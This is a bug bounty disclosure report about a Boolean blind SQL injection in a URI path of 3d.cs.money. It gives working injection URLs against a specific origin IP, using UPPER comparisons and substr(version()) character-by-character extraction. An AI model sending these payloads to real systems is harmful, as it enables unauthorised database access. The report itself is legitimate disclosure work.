Blind Based SQL Injection in 3d.sc.money
C
CS Money
Submitted None
Actions:
Reported by
sawmj
Vulnerability Details
Technical details and impact analysis
Greetings, Hope Y'all good and fine!
## Summary:
I found a Boolean Blind based SQL Injection in your website => 3d.cs.money
It's a URI path injection.
The vulnerability tested on the Original IP behind the CloudflareWAF and I've already reported this in my other report #1105673
### The Affected URI :
http://51.83.253.82/item/default %INJECTION_POINT_HERE%
## Steps To Reproduce:
Go to
"http://51.83.253.82/item/default'and%20UPPER('asd')='asd'--" => It will give you 404
BUT
"http://51.83.253.82/item/default'and%20UPPER('asd')='ASD'--" => It will give you 200
As a PoC I extracted just the version number which is : `20.9.2.2`
and the steps to produce that :
http://51.83.253.82/item/default'and%20substr(version(),1,1)='2'-- ==> will give you 200 OK
http://51.83.253.82/item/default'and%20substr(version(),2,1)='0'-- ==> will give you 200 OK
So on so fourth until you get the full version number.
## Impact
Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. This can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including execution of system commands.
Report Details
Additional information and metadata
State
Closed
Substate
Informative
Submitted
Weakness
SQL Injection